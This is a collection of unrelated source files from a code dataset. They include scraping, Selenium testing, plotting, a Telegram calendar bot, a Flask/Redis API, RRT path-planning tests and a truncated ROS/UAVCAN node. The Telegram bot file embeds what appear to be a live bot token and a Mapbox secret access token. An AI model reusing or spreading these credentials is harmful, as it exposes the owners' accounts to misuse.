'Accept-Encoding':None,\n 'Connection':'close',\n 'Referer':None\n }\n req_timeout = 20\n req = urllib2.Request(url,None,req_header)\n ready = ''\n try:\n resp = urllib2.urlopen(req,None,req_timeout)\n ready = resp.read()\n except:\n pass\n \n soup = BeautifulSoup(ready,'lxml')\n \n try:\n doc = Document(ready)\n html = doc.summary()\n title = doc.short_title()\n except:\n pass\n \n fout = open('aaa','w')\n #print >> fout, soup.select('[itemprop=\"articleBody\"]')[0]\n #print >> fout, '---------------------------------------'\n html = html.encode('ascii', 'ignore')\n html = html.replace('\\r','')\n html = html.replace('\\n','')\n html = html.replace('\\s','')\n core_soup = BeautifulSoup(html, 'lxml')\n print >> fout, core_soup\n print >> fout, '++++++++++++++++++++++++++++'\n core_content = ''.join(core_soup.stripped_strings)\n title = soup.head.find_all('title')\n \n domain = gen_url_domain(url)\n new_title, img_src, core_soup = HtmlImprover(domain, soup, core_soup).get_ans()\n \n print >> fout, core_soup\n print >> fout, new_title\n print >> fout, img_src\n fout.close()\n '''\n divs = soup.find_all('div')\n for div in divs:\n if 'class' in div.attrs:\n if 'big_center_img' in div['class']:\n print div['data-gal-src']\n imgs = soup.find_all('img')\n for img in imgs:\n if '.jpg' in img['src'] and img['alt'] == '':\n print img['src']\n '''\n","sub_path":"chaos/scripts/demo_test.py","file_name":"demo_test.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6677270","text":"## 4 Feladat: charterbooker automatizálása\n# * Teszteld le a többoldalas formanyomtatvány működését.\n# * Ellenőrizd a helyes kitöltésre adott választ: \"Your message was sent successfully. Thanks! We'll be in touch as soon as we can, which is usually like lightning (Unless we're sailing or eating tacos!).\"\n# * Készíts tesztesetet az e-mail cím validációjára.\n\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import Select\nimport time\n\noptions = Options()\n# options.add_argument('--headless')\noptions.add_argument('--disable-gpu')\ndriver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n\ntry:\n driver.get(\"https://witty-hill-0acfceb03.azurestaticapps.net/charterbooker.html\")\n time.sleep(2)\n\n # Locators:\n # 1. page\n select1 = Select(driver.find_element_by_xpath('//*[@id=\"step1\"]/ul/li[1]/select'))\n next_btn1 = driver.find_element_by_xpath('//*[@id=\"step1\"]/ul/li[2]/button')\n # 2. page\n datapicker = driver.find_element_by_xpath('//*[@id=\"step2\"]/ul/li[1]/input')\n select2 = Select(driver.find_element_by_xpath('//*[@id=\"step2\"]/ul/li[2]/select'))\n select3 = Select(driver.find_element_by_xpath('//*[@id=\"step2\"]/ul/li[3]/select'))\n next_btn2 = driver.find_element_by_xpath('//*[@id=\"step2\"]/ul/li[4]/button')\n # 3. page\n fullname = driver.find_element_by_xpath('//*[@id=\"step3\"]/ul/li[1]/input')\n email = driver.find_element_by_xpath('//*[@id=\"step3\"]/ul/li[2]/input')\n msg = driver.find_element_by_xpath('//*[@id=\"step3\"]/ul/li[3]/textarea')\n request_btn3 = driver.find_element_by_xpath('//*[@id=\"step3\"]/ul/li[4]/button')\n\n # Test the full form\n # 1. page\n select1.select_by_value('1')\n next_btn1.click()\n time.sleep(2)\n # 2. page\n datapicker.send_keys('2010')\n select2.select_by_value('Morning')\n select3.select_by_value('3')\n time.sleep(1)\n next_btn2.click()\n time.sleep(2)\n # 3. page\n fullname.send_keys('John Smith')\n email.send_keys('johnsmith@gmail.com')\n msg.send_keys('-')\n request_btn3.click()\n time.sleep(3)\n\n # Check the alert text:\n alert = driver.find_element_by_xpath('//*[@id=\"booking-form\"]/h2')\n assert alert.text == \"Your message was sent successfully. Thanks! We'll be in touch as soon as we can, which is usually like lightning (Unless we're sailing or eating tacos!).\"\n\n # Check valid email address\n driver.get(\"https://witty-hill-0acfceb03.azurestaticapps.net/charterbooker.html\")\n time.sleep(3)\n\n # 1. page\n select1.select_by_value('2')\n next_btn1.click()\n time.sleep(2)\n # 2. page\n datapicker.send_keys('2010')\n select2.select_by_value('Morning')\n select3.select_by_value('3')\n time.sleep(1)\n next_btn2.click()\n time.sleep(2)\n # 3. page\n fullname.send_keys('John Smith')\n email.send_keys('johnsmith@')\n msg.send_keys('-')\n request_btn3.click()\n time.sleep(3)\n\n assert driver.find_element_by_id('bf_email-error').text == \"PLEASE ENTER A VALID EMAIL ADDRESS.\"\nfinally:\n pass\n # driver.close()\n","sub_path":"testproject/charterbooker.py","file_name":"charterbooker.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"410304393","text":"#!/usr/bin/env python\n# coding=utf-8\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Agg')\n\nfrom matplotlib.pyplot import plot,savefig\ndef sin_x():\n x=np.linspace(-4,4,30)\n y=np.sin(x);\n\n plot(x,y,'--*b')\n\n savefig('static/sin.jpg')\n\ndef yx():\n x = [0, 1,2,3,4]\n y = [0, 1,2,3,4] # y = x\n\n plot(x, y)\n savefig(\"static/yx.jpeg\")\n\ndef x2():\n x2 = range(0,10)\n y2 = range(0,10) # y = x\n x1 = range(0, 10)\n y1 = [num**2 for num in x1] # y = x^2\n plot(x1, y1, x2, y2)\n savefig(\"static/x2.jpeg\")\n\nif __name__=='__main__':\n #draw()\n #sin_x()\n yx()\n x2()\n","sub_path":"agrith_util/plot/small_plot.py","file_name":"small_plot.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"361283273","text":"# -*- coding: iso-8859-1 -*-\n\nclass Asset:\n def __init__(self, Name, Value, Plan_Value, Anzahl, Categories):\n self.Name = Name\n self.Value = round(float(Value),2)\n self.Plan_Value = round(float(Plan_Value),2)\n self.Anzahl = Anzahl\n self.Categories = Categories\n\n","sub_path":"src/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231612301","text":"def average():\n t = 0\n tot = 0\n while True:\n x = (input(\"Enter a number (q to stop)\"))\n if x == \"q\":\n return float(tot) / t\n else:\n t = 1 + t\n tot = int(x) + tot\n\n\n\n\ndef main():\n print(average())\n\nif __name__ == '__main__':\n main()\n","sub_path":"average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594687739","text":"from __future__ import print_function\r\n\r\nimport mapbox\r\nimport json\r\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\r\nimport datetime\r\nimport pickle\r\nimport os.path\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\nupdater = Updater(token='1134927516:AAE3Bi5dGXbaZWeO_IXIWZjtwMTpzsn6r64') # Токен API к Telegram\r\ndispatcher = updater.dispatcher\r\n# If modifying these scopes, delete the file token.pickle.\r\nSCOPES = ['https://www.googleapis.com/auth/calendar.readonly']\r\n\r\nclass Calendar:\r\n def __init__(self):\r\n self.service = None\r\n\r\n def startCommand(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id, text=\"Hello! I am an event manager bot.To use me you have authorise\")\r\n creds = None\r\n # The file token.pickle stores the user's access and refresh tokens, and is\r\n # created automatically when the authorization flow completes for the first\r\n # time.\r\n bot.send_message(chat_id=update.message.chat_id,\r\n text=\"https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=558268665760-efbmhgve4ovnendbv5um6sr5o1shqd4a.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A62799%2F&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcalendar.readonly&state=wLSAOuK4H1CvlrgIifQgH9zte1nvcF&access_type=offline\")\r\n if os.path.exists('token.pickle'):\r\n with open('token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n # If there are no (valid) credentials available, let the user log in.\r\n if not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n 'credentials.json', SCOPES)\r\n creds = flow.run_local_server(port=0)\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\n self.service = build('calendar', 'v3', credentials=creds)\r\n\r\n # def textMessage(bot, update):\r\n # response = 'Получил Ваше сообщение: ' + update.message.text\r\n # bot.send_message(chat_id=update.message.chat_id, text=response)\r\n\r\n def AddMessage(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id, text=\"What is the name of event\")\r\n x = update.message.text\r\n GMT_OFF = '+03:00'\r\n event = {\r\n 'summary': 'Dinner with friends',\r\n 'start': {'dateTime': '2015-09-18T19:00:00%s' % GMT_OFF},\r\n 'end': {'dateTime': '2015-09-18T22:00:00%s' % GMT_OFF},\r\n 'attendees': [\r\n {'email': 'friend1@example.com'},\r\n ],\r\n }\r\n self.service.events().insert(calendarId='primary', sendnotification=True, body=event).execute()\r\n\r\n def DeleteMessage(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id, text=\"What is the name of event\")\r\n\r\n def ChangeMessage(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id, text=\"What is the name of event\")\r\n\r\n def CheckDailyMessage(self, bot, update):\r\n pass\r\n\r\n def CheckNextEventsMessage(self, bot, update):\r\n # Call the Calendar API\r\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\r\n bot.send_message(chat_id=update.message.chat_id, text='Getting the upcoming 10 events')\r\n events_result = self.service.events().list(calendarId='primary', timeMin=now,\r\n maxResults=10, singleEvents=True,\r\n orderBy='startTime').execute()\r\n events = events_result.get('items', [])\r\n\r\n if not events:\r\n bot.send_message(chat_id=update.message.chat_id, text='No upcoming events found.')\r\n for event in events:\r\n start = event['start'].get('dateTime', event['start'].get('date'))\r\n bot.send_message(chat_id=update.message.chat_id, text=(start, event['summary']))\r\n\r\n\r\n def geoMessage(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id,\r\n text=\"What is your origin?\")\r\n origin = update.message.text\r\n # time = time.time(20)\r\n bot.send_message(chat_id=update.message.chat_id,\r\n text=\"What is your destination?\")\r\n destination = update.message.text\r\n geocoder = mapbox.Geocoder(access_token='sk.eyJ1IjoiZGlhbmthbG9sNCIsImEiOiJjazhzdjE4c3QwMnlwM2Rud2EwZzg1b29iIn0.OqtyNqmiJI5q6UbWQC6oCQ')\r\n response = geocoder.forward('Paris, France')\r\n with open('text.json', 'w', encoding='UTF-8') as f:\r\n json.dump(response.json(), f)\r\n\r\n from mapbox import Directions\r\n resp = Directions('mapbox.driving').directions([origin, destination])\r\n driving_routes = resp.geojson()\r\n first_route = driving_routes['features'][0]\r\n bot.send_message(chat_id=update.message.chat_id,\r\n pic=resp)\r\n\r\nif __name__ == \"__main__\":\r\n # Хендлеры\r\n c = Calendar()\r\n start_command_handler = CommandHandler('start', c.startCommand)\r\n # text_message_handler = MessageHandler(Filters.text, textMessage)\r\n geo_message_handler = CommandHandler('root', c.geoMessage)\r\n add_message_handler = CommandHandler('add', c.AddMessage)\r\n delete_message_handler = CommandHandler('delete', c.DeleteMessage)\r\n change_message_handler = CommandHandler('change', c.ChangeMessage)\r\n check_daily_message_handler = CommandHandler('check_daily', c.CheckDailyMessage)\r\n check_weekly_message_handler = CommandHandler('check_next_events', c.CheckNextEventsMessage)\r\n # Добавляем хендлеры в диспетчер\r\n dispatcher.add_handler(start_command_handler)\r\n # dispatcher.add_handler(text_message_handler)\r\n dispatcher.add_handler(geo_message_handler)\r\n dispatcher.add_handler(add_message_handler)\r\n dispatcher.add_handler(delete_message_handler)\r\n dispatcher.add_handler(change_message_handler)\r\n dispatcher.add_handler(check_daily_message_handler)\r\n dispatcher.add_handler(check_weekly_message_handler)\r\n # Начинаем поиск обновлений\r\n updater.start_polling(clean=True)\r\n # Останавливаем бота, если были нажаты Ctrl + C\r\n updater.idle()","sub_path":"Hw3.py","file_name":"Hw3.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"57322237","text":"import redis\nfrom flask import Flask\n\nconn = redis.Redis('localhost')\n\napplication = Flask(__name__)\n\n\n@application.route(\"/health\")\ndef health():\n return \"Hello from CloudEnsure Internal API!\"\n\n\n@application.route(\"/\", methods=['GET'])\ndef find_key(key):\n try:\n print(key, type(key))\n values = conn.hgetall(key)\n x = {y.decode('ascii'): values.get(y).decode(\n 'ascii') for y in values.keys()}\n\n return x\n except Exception as e:\n print(e)\n message = \"No result Found\"\n return message\n\n\nif __name__ == \"__main__\":\n application.run(debug=True, host='0.0.0.0')\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"88714226","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Poll',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('stub', models.CharField(max_length=32)),\n ('bot_name', models.CharField(max_length=32)),\n ('frequency', models.IntegerField(default=24)),\n ('submission_removal', models.IntegerField(default=168)),\n ('winning_text', models.CharField(max_length=255, null=True, blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Submission',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('url', models.URLField()),\n ('submitted', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Vote',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('day', models.DateField(auto_now_add=True)),\n ('submission', models.ForeignKey(related_name='submission_votes', to='poll.Submission')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"incrowd/poll/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"483626062","text":"import math\nimport time\nimport statistics\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom shapely.geometry import Polygon, Point\nimport random\n\nfrom rrt_dubins import RRT, createSharkGrid\nfrom motion_plan_state import Motion_plan_state\nimport catalina\nfrom sharkOccupancyGrid import SharkOccupancyGrid, splitCell\n\ndef summary_1(weight, obstacles, boundary, habitats, shark_dict, sharkGrid, test_num=100):\n '''\n generate a summary about each term of one specific cost function, given randomly chosen environment\n \n cost_func: a list of lists of weights assigned to each term in the cost function\n test_num: the number of tests to run under a specific cost function\n\n output:\n cost_avr: a dictionary summarizing the result of each term of the cost function, \n key will be weight i.e. w1, w2, ...\n value will be the average cost of each term\n '''\n testing = RRT(boundary, obstacles, shark_dict, sharkGrid)\n\n cost_summary_ex = [[] for _ in range(len(weight))]\n cost_summary_rp = [[] for _ in range(len(weight))]\n\n for _ in range(test_num):\n initial_x = random.uniform(-300, -100)\n initial_y = random.uniform(-100, 100)\n initial = Point(initial_x, initial_y)\n while not initial.within(boundary_poly):\n initial_x = random.uniform(-300, -100)\n initial_y = random.uniform(-100, 100)\n initial = Point(initial_x, initial_y)\n initial = Motion_plan_state(initial_x, initial_y)\n\n res1 = testing.exploring(initial, habitats, 0.5, 5, 1, 50, True, 20.0, 500.0, weights=weight)\n print(res1[\"cost\"])\n for i in range(len(res1[\"cost\"][1])):\n cost_summary_ex[i].append(res1[\"cost\"][1][i])\n\n res2 = testing.replanning(initial, habitats, 10.0, 100.0, 0.1)\n print(res2[2])\n for i in range(len(res2[2][1])):\n cost_summary_rp[i].append(res2[2][1][i])\n\n #calculate average cost for each term\n result1 = []\n for cost in cost_summary_ex:\n result1.append(statistics.mean(cost))\n result2 = []\n for cost in cost_summary_rp:\n result2.append(statistics.mean(cost))\n \n return [result2, result1]\n\ndef plot_summary_1(labels, summarys):\n x = np.arange(len(labels)) # the label locations\n width = 0.2 # the width of the bars\n weight1 = summarys[0]\n weight2 = summarys[1]\n weight3 = summarys[2]\n weight4 = summarys[3]\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x - 1.5 * width, weight1, width, label='weight1')\n rects2 = ax.bar(x - 0.5 * width, weight2, width, label=\"weight2\")\n rects3 = ax.bar(x + 0.5 * width, weight3, width, label='weight3')\n rects4 = ax.bar(x + 1.5 * width, weight4, width, label='weight4')\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n ax.set_ylabel('average cost')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend()\n\n\n def autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\n autolabel(rects1)\n autolabel(rects2)\n autolabel(rects3)\n autolabel(rects4)\n\n fig.tight_layout()\n\n plt.show()\n\ndef summary_2(start, goal, obstacle_array, boundary, habitats, shark_dict, sharkGrid, test_num, test_time, plot_interval, weights):\n '''generate the average cost of optimal paths of one weight scheme'''\n cost_list = [[]for _ in range(math.ceil(test_time//plot_interval))]\n improvement = []\n\n for _ in range(test_num):\n rrt = RRT(start, goal, boundary, obstacle_array, habitats)\n if weights[1] == \"random time\":\n plan_time = True\n if weights[2] == \"trajectory time stamp\":\n traj_time_stamp = True\n else:\n traj_time_stamp = False\n elif weights[1] == \"random (x,y)\":\n plan_time = False\n traj_time_stamp = False\n result = rrt.exploring(shark_dict, sharkGrid, plot_interval, 5, 1, 50,traj_time_stamp=traj_time_stamp, max_plan_time=test_time, plan_time=plan_time, weights=weights[0])\n if result:\n cost = result[\"cost list\"]\n for i in range(len(cost)):\n cost_list[i].append(cost[i])\n \n cost_mean = []\n for i in range(len(cost_list)):\n temp_mean = statistics.mean(cost_list[i])\n if i >= 1:\n improvement.append(\"{:.0%}\".format(temp_mean / cost_mean[-1]))\n cost_mean.append(temp_mean)\n \n #plot_summary_2(time_list, cost_list)\n #print(cost_mean, improvement)\n return cost_mean, improvement\n\ndef plot_summary_2(x_list, y_list):\n\n for i in range(len(x_list)):\n plt.plot(x_list[i], y_list[i])\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n plt.ylabel('optimal sum cost')\n plt.title('RRT performance')\n\n plt.show()\n\ndef summary_3(start, goal, boundary, boundary_poly, obstacle_array, habitats, shark_dict, test_num, plan_time, plot_interval):\n '''draw average cost of optimal path from different weight schemes as a function of time'''\n results = []\n improvements = []\n time_list = [plot_interval + i * plot_interval for i in range(math.ceil(plan_time//plot_interval))]\n\n weight1 = [[1, -3, -1, -5], \"random time\", \"trajectory time stamp\"]\n weight2 = [[1, -3, -1, -5], \"random time\", \"planning time stamp\"]\n weight3 = [[1, -3, -1, -5], \"random (x,y)\"]\n weights = [weight1, weight2, weight3]\n\n cell_list = splitCell(boundary_poly, 10)\n sharkGrid = createSharkGrid('path_planning/AUVGrid_prob.csv', cell_list)\n \n for weight in weights:\n result, improvement = summary_2(start, goal, obstacle_array, boundary, habitats, shark_dict, sharkGrid, test_num, plan_time, plot_interval, weight)\n results.append(result)\n improvements.append(improvement)\n\n plt.figure(1)\n for i in range(len(results)):\n plt.plot(time_list, results[i], label=str(weights[i]))\n plt.ylabel('Optimal Path Cost')\n plt.xlabel('Planning Time')\n plt.title('Optimal Path Cost VS Planning Time')\n plt.legend()\n plt.show()\n plt.close()\n\n # plt.figure(2)\n # for i in range(len(improvements)):\n # print(time_list[1:], improvements[i])\n # plt.plot(time_list[1:], improvements[i], label=str(weights[i]))\n # plt.ylabel('Proportion Cost Optimization')\n # plt.xlabel('Planning Time')\n # plt.title('Percent Optimization over Planning Time')\n # plt.legend()\n # plt.show()\n # plt.close()\n\ndef plot_time_stamp(start, goal, boundary, obstacle_array, habitats):\n '''draw time stamp distribution of one rrt_rubins path planning algorithm'''\n rrt = RRT(start, goal, boundary, obstacle_array, habitats)\n result = rrt.exploring(habitats, 0.5, 5, 1, max_plan_time=10.0, weights=[1,-4.5,-4.5])\n time_stamp_list = result[\"time stamp\"]\n bin_list = time_stamp_list.keys()\n num_time_list = []\n for time_bin in bin_list:\n num_time_list.append(len(time_stamp_list[time_bin]))\n \n plt.title(\"time stamp distribution\")\n plt.xlabel(\"time stamp bin\")\n plt.ylabel(\"number of motion_plan_states\")\n #plt.xticks(self.bin_list)\n plt.bar(bin_list, num_time_list, color=\"g\")\n \n plt.show()\n\n#initialize start, goal, obstacle, boundary, habitats for path planning\nstart = catalina.create_cartesian(catalina.START, catalina.ORIGIN_BOUND)\nstart = Motion_plan_state(start[0], start[1])\n\ngoal = catalina.create_cartesian(catalina.GOAL, catalina.ORIGIN_BOUND)\ngoal = Motion_plan_state(goal[0], goal[1])\n\nobstacles = []\nfor ob in catalina.OBSTACLES:\n pos = catalina.create_cartesian((ob.x, ob.y), catalina.ORIGIN_BOUND)\n obstacles.append(Motion_plan_state(pos[0], pos[1], size=ob.size))\nfor boat in catalina.BOATS:\n pos = catalina.create_cartesian((boat.x, boat.y), catalina.ORIGIN_BOUND)\n obstacles.append(Motion_plan_state(pos[0], pos[1], size=boat.size))\n \nboundary = []\nboundary_poly = []\nfor b in catalina.BOUNDARIES:\n pos = catalina.create_cartesian((b.x, b.y), catalina.ORIGIN_BOUND)\n boundary.append(Motion_plan_state(pos[0], pos[1]))\n boundary_poly.append((pos[0],pos[1]))\nboundary_poly = Polygon(boundary_poly)\n \n#testing data for habitats\nhabitats = []\nfor habitat in catalina.HABITATS:\n pos = catalina.create_cartesian((habitat.x, habitat.y), catalina.ORIGIN_BOUND)\n habitats.append(Motion_plan_state(pos[0], pos[1], size=habitat.size))\n \n# testing data for shark trajectories\nshark_dict1 = {1: [Motion_plan_state(-120 + (0.2 * i), -60 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 2: [Motion_plan_state(-65 - (0.2 * i), -50 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)],\n 3: [Motion_plan_state(-110 + (0.2 * i), -40 - (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 4: [Motion_plan_state(-105 - (0.2 * i), -55 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)],\n 5: [Motion_plan_state(-120 + (0.2 * i), -50 - (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 6: [Motion_plan_state(-85 - (0.2 * i), -55 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)],\n 7: [Motion_plan_state(-270 + (0.2 * i), 50 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 8: [Motion_plan_state(-250 - (0.2 * i), 75 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)],\n 9: [Motion_plan_state(-260 - (0.2 * i), 75 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 10: [Motion_plan_state(-275 + (0.2 * i), 80 - (0.2 * i), traj_time_stamp=i) for i in range(1,501)]}\n\nshark_dict2 = {1: [Motion_plan_state(-120 + (0.1 * i), -60 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)]+ [Motion_plan_state(-90 - (0.1 * i), -30 + (0.15 * i), traj_time_stamp=i) for i in range(302,501)], \n 2: [Motion_plan_state(-65 - (0.1 * i), -50 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-95 + (0.15 * i), -20 + (0.1 * i), traj_time_stamp=i) for i in range(302,501)],\n 3: [Motion_plan_state(-110 + (0.1 * i), -40 - (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-80 + (0.15 * i), -70 + (0.1 * i), traj_time_stamp=i) for i in range(302,501)], \n 4: [Motion_plan_state(-105 - (0.1 * i), -55 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-135 + (0.12 * i), -25 + (0.07 * i), traj_time_stamp=i) for i in range(302,501)],\n 5: [Motion_plan_state(-120 + (0.1 * i), -50 - (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-90 + (0.11 * i), -80 + (0.1 * i), traj_time_stamp=i) for i in range(302,501)], \n 6: [Motion_plan_state(-85 - (0.1 * i), -55 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-115 - (0.09 * i), -25 - (0.1 * i), traj_time_stamp=i) for i in range(302,501)],\n 7: [Motion_plan_state(-270 + (0.1 * i), 50 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-240 - (0.08 * i), 80 + (0.1 * i), traj_time_stamp=i) for i in range(302,501)], \n 8: [Motion_plan_state(-250 - (0.1 * i), 75 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-280 - (0.1 * i), 105 - (0.1 * i), traj_time_stamp=i) for i in range(302,501)],\n 9: [Motion_plan_state(-260 - (0.1 * i), 75 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-290 + (0.08 * i), 105 + (0.07 * i), traj_time_stamp=i) for i in range(302,501)], \n 10: [Motion_plan_state(-275 + (0.1 * i), 80 - (0.1 * i), traj_time_stamp=i) for i in range(1,301)]+ [Motion_plan_state(-245 - (0.13 * i), 50 - (0.12 * i), traj_time_stamp=i) for i in range(302,501)]}\n# sharkGrid1 = createSharkGrid('path_planning/AUVGrid_prob_500_straight.csv', splitCell(boundary_poly,10))\n# sharkGrid2 = createSharkGrid('path_planning/AUVGrid_prob_500_turn.csv', splitCell(boundary_poly,10))\n\nres = summary_1([1, -3, -1, -5], obstacles, boundary, habitats, shark_dict1, sharkGrid1, test_num=10)\nplot_summary_1([\"replaning\", \"one-time planning\"], res)","sub_path":"path_planning/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":12288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"238463074","text":"#!/usr/bin/env python\n\n# use `pip install future pyuavcan_v0` before running on python 2\n\n# ROS Imports\nimport rospy\nfrom wibotic_msg import msg, srv\n\n# Other Imports\nimport pyuavcan_v0 as uavcan\nimport threading\nimport time\nimport queue\nimport signal\nimport sys\nimport os\n\n# Global state and constants shared between threads\nDSDL_PATH = (\n os.path.dirname(__file__)\n + \"/uavcan_v0/uavcan_vendor_specific_types/wibotic\"\n)\nWIBOTIC_NODE_NAME = \"com.wibotic.charger\"\nPARAMETER_REQ_TIMEOUT = 3\nSUCCESS = 5\nFAILURE = 0\n_uav_incoming_info = queue.Queue()\n_uav_incoming_param = queue.Queue(1)\n_uav_outgoing = queue.Queue()\n_threads = []\n_shutting_down = False\n\n\ndef ClearQueue(q):\n while not q.empty():\n q.get()\n\n\ndef ascii_list_to_str(l):\n return \"\".join(chr(i) for i in l)\n\n\nclass Shutdown(Exception):\n pass\n\n\nclass ROSNodeThread(threading.Thread):\n class Node:\n def sender(self):\n pub = rospy.Publisher(\n \"~wibotic_info\",\n msg.WiBoticInfo,\n queue_size=10,\n )\n while not rospy.is_shutdown():\n incoming_data = _uav_incoming_info.get()\n uavcan_dsdl_type = uavcan.get_uavcan_data_type(\n incoming_data\n )\n unpacked_data = {}\n for field in uavcan_dsdl_type.fields:\n unpacked_data[field.name] = getattr(\n incoming_data, field.name\n )\n packaged_data = msg.WiBoticInfo(\n **unpacked_data\n )\n rospy.loginfo(packaged_data)\n pub.publish(packaged_data)\n\n def handle_param_list(self, req):\n params = []\n index = 0\n ClearQueue(_uav_incoming_param)\n while True:\n request = uavcan.protocol.param.GetSet.Request(\n index=index\n )\n _uav_outgoing.put(request)\n try:\n response = _uav_incoming_param.get(\n block=True,\n timeout=PARAMETER_REQ_TIMEOUT,\n )\n if (\n uavcan.get_active_union_field(\n response.value\n )\n != \"empty\"\n ):\n params.append(\n ascii_list_to_str(response.name)\n )\n index += 1\n rospy.loginfo(index)\n else:\n return [SUCCESS, params]\n except queue.Empty:\n return [FAILURE, params]\n\n def handle_param_read(self, req):\n request = uavcan.protocol.param.GetSet.Request(\n name=req.name\n )\n _uav_outgoing.put(request)\n try:\n response = _uav_incoming_param.get(\n block=True,\n timeout=PARAMETER_REQ_TIMEOUT,\n )\n if (\n uavcan.get_active_union_field(\n response.value\n )\n != \"empty\"\n ):\n status = (\n SUCCESS\n if response.name == req.name\n else FAILURE\n )\n value = response.value.integer_value\n return [status, value]\n except queue.Empty:\n pass\n\n return [FAILURE, 0]\n\n def handle_param_write(self, req):\n request = uavcan.protocol.param.GetSet.Request(\n name=req.name,\n value=uavcan.protocol.param.Value(\n integer_value=req.value\n ),\n )\n _uav_outgoing.put(request)\n try:\n response = _uav_incoming_param.get(\n block=True,\n timeout=PARAMETER_REQ_TIMEOUT,\n )\n if (\n uavcan.get_active_union_field(\n response.value\n )\n != \"empty\"\n ):\n return (\n SUCCESS\n if response.value.integer_value\n == req.value\n else FAILURE\n )\n except queue.Empty:\n pass\n\n return FAILURE\n\n def handle_param_save(self, req):\n request = uavcan.protocol.param.ExecuteOpcode.Request(\n 